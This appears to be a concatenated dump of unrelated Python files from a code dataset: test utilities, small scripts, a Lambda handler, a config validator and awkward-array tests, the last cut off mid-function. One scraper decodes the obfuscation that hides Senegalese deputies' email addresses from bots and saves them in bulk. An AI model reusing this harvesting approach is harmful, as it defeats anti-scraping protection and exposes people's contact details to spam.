classifications.find()","sub_path":"decals/z_analysis/confusion_matrix/investigate_gz_dump.py","file_name":"investigate_gz_dump.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"19993971","text":"# coding=utf-8\n\ntry:\n from airtest.core.api import device as current_device\n from airtest.core.api import touch, swipe\n from airtest.core.helper import device_platform\nexcept ImportError:\n # 兼容旧版本\n from airtest.cli.runner import device as current_device\n from airtest.core.main import touch, swipe\n from airtest.core.main import get_platform as device_platform\nfrom poco.sdk.interfaces.input import InputInterface\n\n\nclass AirtestInput(InputInterface):\n def __init__(self):\n super(AirtestInput, self).__init__()\n self.default_touch_down_duration = 0.01\n\n def _get_touch_resolution(self):\n \"\"\"\n get real time resolution on device if full screen\n or window size if running in window mode\n \"\"\"\n return current_device().get_current_resolution()\n\n def setTouchDownDuration(self, duration):\n self.default_touch_down_duration = duration\n\n def getTouchDownDuration(self):\n return self.default_touch_down_duration\n\n def click(self, x, y):\n pw, ph = self._get_touch_resolution()\n pos = [x * pw, y * ph]\n touch(pos, duration=self.default_touch_down_duration)\n\n def swipe(self, x1, y1, x2, y2, duration=2.0):\n if duration <= 0:\n raise ValueError(\"Operation duration cannot be less equal 0. Please provide a positive number.\")\n direction = x2 - x1, y2 - y1\n pw, ph = self._get_touch_resolution()\n p1 = [x1 * pw, y1 * ph]\n steps = int(duration * 40) + 1\n swipe(p1, vector=direction, duration=duration, steps=steps)\n\n def longClick(self, x, y, duration=2.0):\n if duration <= 0:\n raise ValueError(\"Operation duration cannot be less equal 0. Please provide a positive number.\")\n pw, ph = self._get_touch_resolution()\n pos = [x * pw, y * ph]\n touch(pos, duration=duration)\n","sub_path":"poco/utils/airtest/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"360269843","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('Salary_Data.csv');\r\n\r\nx = data['YearsExperience'].values\r\ny = data['Salary'].values\r\n\r\ndef pred(x,y):\r\n m = ((np.mean(x))*(np.mean(y))-np.mean(x*y))/(((np.mean(x))**2)-np.mean(x**2))\r\n b = np.mean(y) - m*np.mean(x)\r\n print(m,b)\r\n y_new=[]\r\n for i in x:\r\n y_new.append(b + m*i)\r\n return y_new; \r\n \r\n\r\ndef Standard_error_line(y,y_new):\r\n sdl = sum((y-y_new)**2)\r\n return sdl;\r\n \r\ndef Standard_error_mean(y):\r\n y_mean=[]\r\n for i in y:\r\n y_mean.append(np.mean(y))\r\n sdm = sum((y-y_mean)**2)\r\n return sdm;\r\n \r\n\r\ndef cofficient(x,y):\r\n y_new = pred(x,y)\r\n sdl = Standard_error_line(y,y_new)\r\n sdm = Standard_error_mean(y)\r\n r = 1 - (sdl/sdm)\r\n return r;\r\n \r\nr = cofficient(x,y)\r\nprint(r)\r\n\r\nplt.scatter(x,y,color=\"green\")\r\nplt.plot(x,y_new,color=\"orange\")\r\nplt.show()","sub_path":"ML2.py","file_name":"ML2.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"608183548","text":"# -*- coding: utf-8 -*-\nfrom codecs import open\nfrom unidecode import unidecode\nfrom bs4 import BeautifulSoup\nfrom urllib2 import urlopen\nimport json,csv\nimport re,htmlentitydefs\n\n# Fonction de decodage des caractères ASCII qui caché l'adresse mail facile pour un bot \n# Un glue de chez Seb! j aime bien son génie de python\n\n\ndef htmlentitydecode(s):\n # First convert alpha entities (such as é)\n # (Inspired from http://mail.python.org/pipermail/python-list/2007-June/443813.html)\n def entity2char(m):\n entity = m.group(1)\n if entity in htmlentitydefs.name2codepoint:\n return unichr(htmlentitydefs.name2codepoint[entity])\n return u\" \" # Unknown entity: We replace with a space.\n t = re.sub(u'&(%s);' % u'|'.join(htmlentitydefs.name2codepoint), entity2char, s)\n \n # Then convert numerical entities (such as é)\n t = re.sub(u'&#(\\d+);', lambda x: unichr(int(x.group(1))), t)\n \n # Then convert hexa entities (such as é)\n return re.sub(u'&#x(\\w+);', lambda x: unichr(int(x.group(1),16)), t)\n\n\ndef vas_chercher():\n\n\t#Liste des quelques urls des pages qui contiennent la liste des deputes\n\t#Encore une optimisation comme celel d alioune sur le nombre de page avec une incrementation possible \n\turls = {\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=1\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=2\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=3\",\n\t\t\"http://www.assemblee-nationale.sn/index.php?option=com_content&view=article&id=214&Itemid=218&limitstart=4\"\n\t}\n\n\tdeputes = []\n\n\tfor url in urls:\n\t\tpage = urlopen(url)\n\t\tlaSoupe = BeautifulSoup(page.read())\n\n\t\t# capture de la table qui se situe juste après la div.pagenavcounter\n\t\ttableDepute = laSoupe.find('div', { 'class':'pagenavcounter'}).findNextSibling().tbody.find_all('tr')\n\t\t\n\t\t# Retrait du haut de la pile, les dechets qui devaient figurer dans le Thead du tableau\n\t\ttableDepute.pop(0)\n\n\t\t\n\t\tfor tr in tableDepute:\n\t\t\ttds = tr.find_all('td')\n\n\t\t\tdepute = []\n\n\t\t\tfor td in tds:\n\n\t\t\t\t# tranformation des données en unicode pour pouvoir reconstruire les adresses emails des deputes\n\t\t\t\t# le code pourrait faire une refactoristation pour seulement etre seulement a l indice ou le texte\n\t\t\t\t# situé\n\t\t\t\tsanitizedString = htmlentitydecode(td.get_text())\n\t\t\t\t\n\t\t\t\t# le bouillon de regex pour capturer cette semblante sécurité\n\t\t\t\tmail = re.search(r\"var addy([0-9]*) \\= '([a-z0-9\\.\\_\\-]*)'\",sanitizedString,re.M|re.I); \n\n\t\t\t\tif mail:\n\t\t\t\t\tdepute.append(mail.group(2)+'@assemblee-nationale.sn')\n\t\t\t\telse:\n\t\t\t\t\tdepute.append(td.get_text().encode('utf-8'))\n\t\t\t\t#print depute\n\t\t\tdeputes.append(depute)\n\t\t\tdeputes = sorted(deputes, key= lambda dep: int(dep[0]))\n\t# Saving to json\n\tjson_file = open('data/data.json','w')\n\tjson.dump(deputes,json_file)\n\tjson_file.close();\n\n\t#saving to csv\n\tentete = ['id','Prénom','Nom','Email']\n\tdeputes.insert(0,entete)\n\n\tcsv_file = open('data/data.csv','w')\n\twriter = csv.writer(csv_file,delimiter=b',')\n\tfor line in deputes:\n\t\twriter.writerow(line)\n\n\n\nvas_chercher()","sub_path":"scripts/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"119616374","text":"\r\n\r\ndef do_print(case, positions):\r\n out.write(\"Case #{0}:\".format(case))\r\n for i in positions:\r\n out.write(\" {0}\".format(i))\r\n out.write(\"\\n\")\r\n\r\ndef calc_position(K, C, positions):\r\n if len(positions) != C:\r\n print(\"WARNING\")\r\n for _ in range(C-len(positions)):\r\n positions.append(0)\r\n\r\n x = list(reversed(range(C)))\r\n ret = 1\r\n for i in range(C):\r\n ret = ret + (K**x[i])*positions[i]\r\n # print(\"RET: {}\".format(ret))\r\n return ret\r\n\r\n\r\nf = open(\"D-large.in\")\r\nout = open(\"out.txt\", \"w\")\r\nT = int(f.readline())\r\nprint(T)\r\n\r\nfor i in range(T):\r\n K,C,S = map(int, f.readline().split())\r\n print(\"kcs {0},{1},{2}\".format(K,C,S))\r\n # if S >= K:\r\n # do_print(i+1, [p+1 for p in range(S)])\r\n # continue\r\n if C*S >= K:\r\n pos_list = []\r\n pos = []\r\n for p in range(K):\r\n pos.append(p)\r\n if len(pos) == C:\r\n pos_list.append(calc_position(K, C, pos))\r\n pos = []\r\n # print(\"POS: {}\".format(pos))\r\n if len(pos) != 0:\r\n pos_list.append(calc_position(K, C, pos))\r\n do_print(i+1, pos_list)\r\n continue\r\n out.write(\"Case #{0}: {1}\\n\".format(i+1, \"IMPOSSIBLE\"))\r\n","sub_path":"codes/CodeJamCrawler/16_0_4_neat/16_0_4_EarthShadows_fractal.py","file_name":"16_0_4_EarthShadows_fractal.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"171299565","text":"\n\n#calss header\nclass _QUOTE():\n\tdef __init__(self,): \n\t\tself.name = \"QUOTE\"\n\t\tself.definitions = [u'to repeat the words that someone else has said or written: ', u'If you quote a fact or example, you refer to it in order to add emphasis to what you are saying: ', u'to give a price, especially one that will be charged for doing a piece of work: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_quote.py","file_name":"_quote.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"542120681","text":"import utils.API_Responses as Responses\nimport utils.Dynamo as Dynamo\nimport utils.EC2 as EC2 \nfrom botocore.exceptions import ClientError\nfrom datetime import datetime\n\ndef handler(event, context):\n item = {\n \"PK\": \"CONSTRAINT\",\n \"SK\": datetime.now().isoformat(),\n \"modifiedAt\": datetime.now().isoformat()\n }\n for key, value in event['queryStringParameters'].items():\n if key != 'force':\n item[key] = value\n try:\n Dynamo.put(Item=item)\n EC2.start_instance(event['queryStringParameters'])\n return Responses._201()\n except ClientError as e:\n return Responses._CustomResponse(e.response['Error']['Message'], e.response['ResponseMetadata']['HTTPStatusCode'])\n","sub_path":"endpoints/createConstraint.py","file_name":"createConstraint.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"494831477","text":"class MemoryReallocation(object):\n def __init__(self):\n pass\n\n def reallocate(self, banks):\n current_banks = tuple([int(i) for i in banks.split()])\n\n # Save the initial state of the world\n seen_banks = {current_banks}\n seen_banks_at_cycle = {}\n count = 1\n while True:\n current_banks = self.spread(current_banks)\n if current_banks in seen_banks:\n return count, count - seen_banks_at_cycle[current_banks] + 1\n count += 1\n seen_banks.add(current_banks)\n seen_banks_at_cycle[current_banks] = count\n\n def spread(self, banks):\n \"\"\"\n Distribute the largest bank across the other memory banks evenly\n :param banks:\n :return: A rebalanced banks\n \"\"\"\n # Find the max bank\n banks_list = list(banks)\n max_bank_value = max(banks_list)\n max_bank_index = banks_list.index(max_bank_value)\n\n # Clear out the memory block\n banks_list[max_bank_index] = 0\n for i in range(max_bank_index + 1, max_bank_index + 1 + max_bank_value):\n banks_list[i % len(banks_list)] += 1\n return tuple(banks_list)\n\n\n\"\"\"\n\nOut of curiosity, the debugger would also like to know the size of the loop: starting from a state that has already been seen, how many block redistribution cycles must be performed before that same state is seen again?\n\nIn the example above, 2 4 1 2 is seen again after four cycles, and so the answer in that example would be 4.\n\nHow many cycles are in the infinite loop that arises from the configuration in your puzzle input?\n\"\"\"\n","sub_path":"advent/memory_reallocation.py","file_name":"memory_reallocation.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"214576550","text":"from __future__ import print_function\n\nimport importlib\nimport logging\nfrom collections import OrderedDict\n\nimport voluptuous as vol\nfrom voluptuous.humanize import humanize_error\n\nfrom esphomeyaml import core, yaml_util, core_config\nfrom esphomeyaml.const import CONF_ESPHOMEYAML, CONF_PLATFORM, CONF_WIFI, ESP_PLATFORMS\nfrom esphomeyaml.core import ESPHomeYAMLError\nfrom esphomeyaml.helpers import color\n\n_LOGGER = logging.getLogger(__name__)\n\nREQUIRED_COMPONENTS = [\n CONF_ESPHOMEYAML, CONF_WIFI\n]\n_COMPONENT_CACHE = {}\n_ALL_COMPONENTS = []\n\n\ndef get_component(domain):\n if domain in _COMPONENT_CACHE:\n return _COMPONENT_CACHE[domain]\n\n path = 'esphomeyaml.components.{}'.format(domain)\n try:\n module = importlib.import_module(path)\n except ImportError as err:\n _LOGGER.debug(err)\n else:\n _COMPONENT_CACHE[domain] = module\n return module\n\n _LOGGER.error(\"Unable to find component %s\", domain)\n return None\n\n\ndef get_platform(domain, platform):\n return get_component(\"{}.{}\".format(domain, platform))\n\n\ndef is_platform_component(component):\n return hasattr(component, 'PLATFORM_SCHEMA')\n\n\ndef iter_components(config):\n for domain, conf in config.iteritems():\n if domain == CONF_ESPHOMEYAML:\n continue\n component = get_component(domain)\n yield domain, component, conf\n if is_platform_component(component):\n for p_config in conf:\n p_name = u\"{}.{}\".format(domain, p_config[CONF_PLATFORM])\n platform = get_component(p_name)\n yield p_name, platform, p_config\n\n\nclass Config(OrderedDict):\n def __init__(self):\n super(Config, self).__init__()\n self.errors = []\n\n def add_error(self, message, domain=None, config=None):\n if not isinstance(message, unicode):\n message = unicode(message)\n self.errors.append((message, domain, config))\n\n\ndef iter_ids(config, prefix=None, parent=None):\n prefix = prefix or []\n parent = parent or {}\n if isinstance(config, core.ID):\n yield config, prefix, parent\n elif isinstance(config, core.Lambda):\n for id in config.requires_ids:\n yield id, prefix, parent\n elif isinstance(config, list):\n for i, item in enumerate(config):\n for result in iter_ids(item, prefix + [str(i)], config):\n yield result\n elif isinstance(config, dict):\n for key, value in config.iteritems():\n for result in iter_ids(value, prefix + [str(key)], config):\n yield result\n\n\ndef do_id_pass(result):\n declare_ids = []\n searching_ids = []\n for id, prefix, config in iter_ids(result):\n if id.is_declaration:\n if id.id is not None and any(v[0].id == id.id for v in declare_ids):\n result.add_error(\"ID {} redefined!\".format(id.id), '.'.join(prefix), config)\n continue\n declare_ids.append((id, prefix, config))\n else:\n searching_ids.append((id, prefix, config))\n # Resolve default ids after manual IDs\n for id, _, _ in declare_ids:\n id.resolve([v[0].id for v in declare_ids])\n\n # Check searched IDs\n for id, prefix, config in searching_ids:\n if id.id is not None and not any(v[0].id == id.id for v in declare_ids):\n result.add_error(\"Couldn't find ID {}\".format(id.id), '.'.join(prefix), config)\n if id.id is None and id.type is not None:\n id.id = next((v[0].id for v in declare_ids if v[0].type == id.type), None)\n if id.id is None:\n result.add_error(\"Couldn't resolve ID for type {}\".format(id.type),\n '.'.join(prefix), config)\n\n\ndef validate_config(config):\n global _ALL_COMPONENTS\n\n for req in REQUIRED_COMPONENTS:\n if req not in config:\n raise ESPHomeYAMLError(\"Component {} is required for esphomeyaml.\".format(req))\n\n _ALL_COMPONENTS = list(config.keys())\n\n result = Config()\n\n def _comp_error(ex, domain, config):\n result.add_error(_format_config_error(ex, domain, config), domain, config)\n\n try:\n result[CONF_ESPHOMEYAML] = core_config.CONFIG_SCHEMA(config[CONF_ESPHOMEYAML])\n except vol.Invalid as ex:\n _comp_error(ex, CONF_ESPHOMEYAML, config[CONF_ESPHOMEYAML])\n\n for domain, conf in config.iteritems():\n domain = str(domain)\n if domain == CONF_ESPHOMEYAML or domain.startswith('.'):\n continue\n if conf is None:\n conf = {}\n component = get_component(domain)\n if component is None:\n result.add_error(u\"Component not found: {}\".format(domain), domain, conf)\n continue\n\n esp_platforms = getattr(component, 'ESP_PLATFORMS', ESP_PLATFORMS)\n if core.ESP_PLATFORM not in esp_platforms:\n result.add_error(u\"Component {} doesn't support {}.\".format(domain, core.ESP_PLATFORM),\n domain, conf)\n continue\n\n success = True\n dependencies = getattr(component, 'DEPENDENCIES', [])\n for dependency in dependencies:\n if dependency not in _ALL_COMPONENTS:\n result.add_error(u\"Component {} requires component {}\".format(domain, dependency),\n domain, conf)\n success = False\n if not success:\n continue\n\n if hasattr(component, 'CONFIG_SCHEMA'):\n try:\n validated = component.CONFIG_SCHEMA(conf)\n result[domain] = validated\n except vol.Invalid as ex:\n _comp_error(ex, domain, conf)\n continue\n\n if not hasattr(component, 'PLATFORM_SCHEMA'):\n continue\n\n platforms = []\n for p_config in conf:\n if not isinstance(p_config, dict):\n result.add_error(u\"Platform schemas must have 'platform:' key\", )\n continue\n p_name = p_config.get(u'platform')\n if p_name is None:\n result.add_error(u\"No platform specified for {}\".format(domain))\n continue\n p_domain = u'{}.{}'.format(domain, p_name)\n platform = get_platform(domain, p_name)\n if platform is None:\n result.add_error(u\"Platform not found: {}\".format(p_domain), p_domain, p_config)\n continue\n\n success = True\n dependencies = getattr(platform, 'DEPENDENCIES', [])\n for dependency in dependencies:\n if dependency not in _ALL_COMPONENTS:\n result.add_error(\n u\"Platform {} requires component {}\".format(p_domain, dependency),\n p_domain, p_config)\n success = False\n if not success:\n continue\n\n esp_platforms = getattr(platform, 'ESP_PLATFORMS', ESP_PLATFORMS)\n if core.ESP_PLATFORM not in esp_platforms:\n result.add_error(\n u\"Platform {} doesn't support {}.\".format(p_domain, core.ESP_PLATFORM),\n p_domain, p_config)\n continue\n\n if hasattr(platform, u'PLATFORM_SCHEMA'):\n try:\n p_validated = platform.PLATFORM_SCHEMA(p_config)\n except vol.Invalid as ex:\n _comp_error(ex, p_domain, p_config)\n continue\n platforms.append(p_validated)\n result[domain] = platforms\n\n do_id_pass(result)\n return result\n\n\nREQUIRED = ['esphomeyaml', 'wifi']\n\n\ndef _format_config_error(ex, domain, config):\n message = u\"Invalid config for [{}]: \".format(domain)\n if u'extra keys not allowed' in ex.error_message:\n message += u'[{}] is an invalid option for [{}]. Check: {}->{}.' \\\n .format(ex.path[-1], domain, domain,\n u'->'.join(str(m) for m in ex.path))\n else:\n message += u'{}.'.format(humanize_error(config, ex))\n\n if isinstance(config, list):\n return message\n\n domain_config = config.get(domain, config)\n message += u\" (See {}, line {}). \".format(\n getattr(domain_config, '__config_file__', '?'),\n getattr(domain_config, '__line__', '?'))\n\n return message\n\n\ndef load_config(path):\n try:\n config = yaml_util.load_yaml(path)\n except OSError:\n raise ESPHomeYAMLError(u\"Could not read configuration file at {}\".format(path))\n core.RAW_CONFIG = config\n core_config.preload_core_config(config)\n\n try:\n result = validate_config(config)\n except ESPHomeYAMLError:\n raise\n except Exception:\n _LOGGER.error(u\"Unexpected exception while reading configuration:\")\n raise\n\n return result\n\n\ndef line_info(obj, **kwargs):\n \"\"\"Display line config source.\"\"\"\n if hasattr(obj, '__config_file__'):\n return color('cyan', \"[source {}:{}]\"\n .format(obj.__config_file__, obj.__line__ or '?'),\n **kwargs)\n return '?'\n\n\ndef dump_dict(layer, indent_count=3, listi=False, **kwargs):\n def sort_dict_key(val):\n \"\"\"Return the dict key for sorting.\"\"\"\n key = str.lower(val[0])\n return '0' if key == 'platform' else key\n\n indent_str = indent_count * ' '\n if listi or isinstance(layer, list):\n indent_str = indent_str[:-1] + '-'\n if isinstance(layer, dict):\n for key, value in sorted(layer.items(), key=sort_dict_key):\n if isinstance(value, (dict, list)):\n print(indent_str, key + ':', line_info(value, **kwargs))\n dump_dict(value, indent_count + 2)\n else:\n print(indent_str, key + ':', value)\n indent_str = indent_count * ' '\n if isinstance(layer, (list, tuple)):\n for i in layer:\n if isinstance(i, dict):\n dump_dict(i, indent_count + 2, True)\n else:\n print(' ', indent_str, i)\n\n\ndef read_config(path):\n _LOGGER.info(\"Reading configuration...\")\n try:\n res = load_config(path)\n except ESPHomeYAMLError as err:\n _LOGGER.error(u\"Error while reading config: %s\", err)\n return None\n excepts = {}\n for message, domain, config in res.errors:\n domain = domain or u\"General Error\"\n excepts.setdefault(domain, []).append(message)\n if config is not None:\n excepts[domain].append(config)\n\n if excepts:\n print(color('bold_white', u\"Failed config\"))\n for domain, config in excepts.iteritems():\n print(' ', color('bold_red', domain + ':'), color('red', '', reset='red'))\n dump_dict(config, reset='red')\n print(color('reset'))\n return None\n return OrderedDict(res)\n","sub_path":"esphomeyaml/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"396603634","text":"import time,os\nfrom PIL import ImageGrab,Image\nfrom utils.config import SCREEN_PATH\n\n\ndef Screeshot():\n tm = time.strftime(\"%Y%m%d-%H%M%S\", time.localtime())\n print(tm)\n im = ImageGrab.grab()\n im.show() \n im.save(SCREEN_PATH + r'\\\\%s.png' % tm)\n\nwhile True:\n print('截图')\n Screeshot()\n print('暂停')\n time.sleep(10)","sub_path":"venv/test_2/jieping.py","file_name":"jieping.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73286726","text":"import cv2\n\n## load an image from\nimg = cv2.imread(\"assets/RE.jpeg\",0)##put mode of image(-1 for transperency, 0 for grey scale mode, 1 fpr including alpha )\n## in bgr you get colorfull image\n\n\n#### resize and rotate this image\n#img= cv2.resize(img,(1300,1600))\nimg= cv2.resize(img,(0,0), fx=2, fy= 2)\n\n\n\n###\n##rotate this image\n# img = cv2.rotate(img, cv2.cv2.ROTATE_90_CLOCKWISE)\n## \ncv2.imwrite(\"new.jpeg\", img)\n \n \n \n# put mode of image(-1 for transperency, 0 for grey scale mode, 1 fpr including alpha )\n## in bgr you get colorfull image\n\ncv2.imshow(\"Roy\",img)\ncv2.waitKey(0) # wait for 5 seccond\n\ncv2.destroyAllWindows()","sub_path":"introduction_images.py","file_name":"introduction_images.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"278968085","text":"from sys import stdin\ndef veri(matriz):\n filas = []\n column= []\n for i in range(len(matriz)):\n sumcol= 0\n for j in range(len(matriz)):\n sumcol += matriz[j][i]\n if sum(matriz[i])%2 == 1:\n filas.append(i+1)\n if sumcol%2 ==1:\n column.append(i+1)\n if len(filas)==0 and len(column)==0:\n return 1\n elif len(filas)>=2 or len(column)>=2:\n return 2\n else:\n return filas[0],column[0]\ndef shift(matriz, tam):\n return 2,3\ndef main():\n tam = int(stdin.readline())\n while tam != 0:\n y = []\n for j in range(tam):\n y.append([int(x) for x in stdin.readline().split()])\n if veri(y) == 2:\n print(\"Corrupt\")\n elif veri(y) == 1:\n print(\"OK\")\n else:\n fil,col= veri(y)\n print(\"Change bit (\"+str(fil)+\",\"+str(col)+\")\")\n tam = int(stdin.readline())\nmain()\n","sub_path":"ejercicios/Strings/paridad.py","file_name":"paridad.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"993894","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport pytest # noqa: F401\nimport numpy as np # noqa: F401\nimport awkward as ak # noqa: F401\n\n\ndef test_getitem():\n content0 = ak.from_iter([[1.1, 2.2, 3.3], [], [4.4, 5.5]], highlevel=False)\n content1 = ak.from_iter([\"one\", \"two\", \"three\", \"four\", \"five\"], highlevel=False)\n tags = ak.layout.Index8(np.array([1, 1, 0, 0, 1, 0, 1, 1], dtype=np.int8))\n\n assert np.asarray(ak.layout.UnionArray8_32.regular_index(tags)).tolist() == [\n 0,\n 1,\n 0,\n 1,\n 2,\n 2,\n 3,\n 4,\n ]\n assert np.asarray(ak.layout.UnionArray8_32.regular_index(tags)).dtype == np.dtype(\n np.int32\n )\n assert np.asarray(ak.layout.UnionArray8_U32.regular_index(tags)).tolist() == [\n 0,\n 1,\n 0,\n 1,\n 2,\n 2,\n 3,\n 4,\n ]\n assert np.asarray(ak.layout.UnionArray8_U32.regular_index(tags)).dtype == np.dtype(\n np.uint32\n )\n assert np.asarray(ak.layout.UnionArray8_64.regular_index(tags)).tolist() == [\n 0,\n 1,\n 0,\n 1,\n 2,\n 2,\n 3,\n 4,\n ]\n assert np.asarray(ak.layout.UnionArray8_64.regular_index(tags)).dtype == np.dtype(\n np.int64\n )\n\n index = ak.layout.Index32(np.array([0, 1, 0, 1, 2, 2, 4, 3], dtype=np.int32))\n array = ak.layout.UnionArray8_32(tags, index, [content0, content1])\n assert np.asarray(array.tags).tolist() == [1, 1, 0, 0, 1, 0, 1, 1]\n assert np.asarray(array.tags).dtype == np.dtype(np.int8)\n assert np.asarray(array.index).tolist() == [0, 1, 0, 1, 2, 2, 4, 3]\n assert np.asarray(array.index).dtype == np.dtype(np.int32)\n assert type(array.contents) is list\n assert [ak.to_list(x) for x in array.contents] == [\n [[1.1, 2.2, 3.3], [], [4.4, 5.5]],\n [\"one\", \"two\", \"three\", \"four\", \"five\"],\n ]\n assert array.numcontents == 2\n assert ak.to_list(array.content(0)) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n assert ak.to_list(array.content(1)) == [\"one\", \"two\", \"three\", \"four\", \"five\"]\n assert ak.to_list(array.project(0)) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n assert ak.to_list(array.project(1)) == [\"one\", \"two\", \"three\", \"five\", \"four\"]\n repr(array)\n\n assert ak.to_list(array[0]) == \"one\"\n assert ak.to_list(array[1]) == \"two\"\n assert ak.to_list(array[2]) == [1.1, 2.2, 3.3]\n assert ak.to_list(array[3]) == []\n assert ak.to_list(array[4]) == \"three\"\n assert ak.to_list(array[5]) == [4.4, 5.5]\n assert ak.to_list(array[6]) == \"five\"\n assert ak.to_list(array[7]) == \"four\"\n\n assert ak.to_list(array) == [\n \"one\",\n \"two\",\n [1.1, 2.2, 3.3],\n [],\n \"three\",\n [4.4, 5.5],\n \"five\",\n \"four\",\n ]\n assert ak.to_list(array[1:-1]) == [\n \"two\",\n [1.1, 2.2, 3.3],\n [],\n \"three\",\n [4.4, 5.5],\n \"five\",\n ]\n assert ak.to_list(array[2:-2]) == [[1.1, 2.2, 3.3], [], \"three\", [4.4, 5.5]]\n assert ak.to_list(array[::2]) == [\"one\", [1.1, 2.2, 3.3], \"three\", \"five\"]\n assert ak.to_list(array[::2, 1:]) == [\"ne\", [2.2, 3.3], \"hree\", \"ive\"]\n assert ak.to_list(array[:, :-1]) == [\n \"on\",\n \"tw\",\n [1.1, 2.2],\n [],\n \"thre\",\n [4.4],\n \"fiv\",\n \"fou\",\n ]\n\n content2 = ak.from_iter(\n [{\"x\": 0, \"y\": []}, {\"x\": 1, \"y\": [1.1]}, {\"x\": 2, \"y\": [1.1, 2.2]}],\n highlevel=False,\n )\n content3 = ak.from_iter(\n [\n {\"x\": 0.0, \"y\": \"zero\", \"z\": False},\n {\"x\": 1.1, \"y\": \"one\", \"z\": True},\n {\"x\": 2.2, \"y\": \"two\", \"z\": False},\n {\"x\": 3.3, \"y\": \"three\", \"z\": True},\n {\"x\": 4.4, \"y\": \"four\", \"z\": False},\n ],\n highlevel=False,\n )\n array2 = ak.layout.UnionArray8_32(tags, index, [content2, content3])\n assert ak.to_list(array2) == [\n {\"x\": 0.0, \"y\": \"zero\", \"z\": False},\n {\"x\": 1.1, \"y\": \"one\", \"z\": True},\n {\"x\": 0, \"y\": []},\n {\"x\": 1, \"y\": [1.1]},\n {\"x\": 2.2, \"y\": \"two\", \"z\": False},\n {\"x\": 2, \"y\": [1.1, 2.2]},\n {\"x\": 4.4, \"y\": \"four\", \"z\": False},\n {\"x\": 3.3, \"y\": \"three\", \"z\": True},\n ]\n assert ak.to_list(array2[\"x\"]) == [0.0, 1.1, 0, 1, 2.2, 2, 4.4, 3.3]\n assert ak.to_list(array2[\"y\"]) == [\n \"zero\",\n \"one\",\n [],\n [1.1],\n \"two\",\n [1.1, 2.2],\n \"four\",\n \"three\",\n ]\n assert ak.to_list(array2[:, \"y\", 1:]) == [\n \"ero\",\n \"ne\",\n [],\n [],\n \"wo\",\n [2.2],\n \"our\",\n \"hree\",\n ]\n assert ak.to_list(array2[\"y\", :, 1:]) == [\n \"ero\",\n \"ne\",\n [],\n [],\n \"wo\",\n [2.2],\n \"our\",\n \"hree\",\n ]\n with pytest.raises(ValueError) as err:\n array2[:, 1:, \"y\"]\n assert str(err.value).startswith(\"in NumpyArray, too many dimensions in slice\")\n with pytest.raises(ValueError) as err:\n array2[\"z\"]\n assert str(err.value).startswith('key \"z\" does not exist (not in record)')\n\n array3 = ak.layout.UnionArray8_32(tags, index, [content3, content2])\n array4 = ak.layout.UnionArray8_32(\n tags, index, [content0, content1, content2, content3]\n )\n assert set(content2.keys()) == {\"x\", \"y\"}\n assert set(content3.keys()) == {\"x\", \"y\", \"z\"}\n assert set(array2.keys()) == {\"x\", \"y\"}\n assert set(array3.keys()) == {\"x\", \"y\"}\n assert array4.keys() == []\n\n\ndef test_identities():\n content0 = ak.from_iter([[1.1, 2.2, 3.3], [], [4.4, 5.5]], highlevel=False)\n content1 = ak.from_iter([\"one\", \"two\", \"three\", \"four\", \"five\"], highlevel=False)\n tags = ak.layout.Index8(np.array([1, 1, 0, 0, 1, 0, 1, 1], dtype=np.int8))\n index = ak.layout.Index32(np.array([0, 1, 0, 1, 2, 2, 4, 3], dtype=np.int32))\n array = ak.layout.UnionArray8_32(tags, index, [content0, content1])\n\n array.setidentities()\n assert np.asarray(array.identities).tolist() == [\n [0],\n [1],\n [2],\n [3],\n [4],\n [5],\n [6],\n [7],\n ]\n assert np.asarray(array.content(0).identities).tolist() == [[2], [3], [5]]\n assert np.asarray(array.content(1).identities).tolist() == [[0], [1], [4], [7], [6]]\n\n\ndef test_fromiter():\n builder = ak.layout.ArrayBuilder()\n\n builder.integer(0)\n builder.integer(1)\n builder.integer(2)\n builder.beginlist()\n 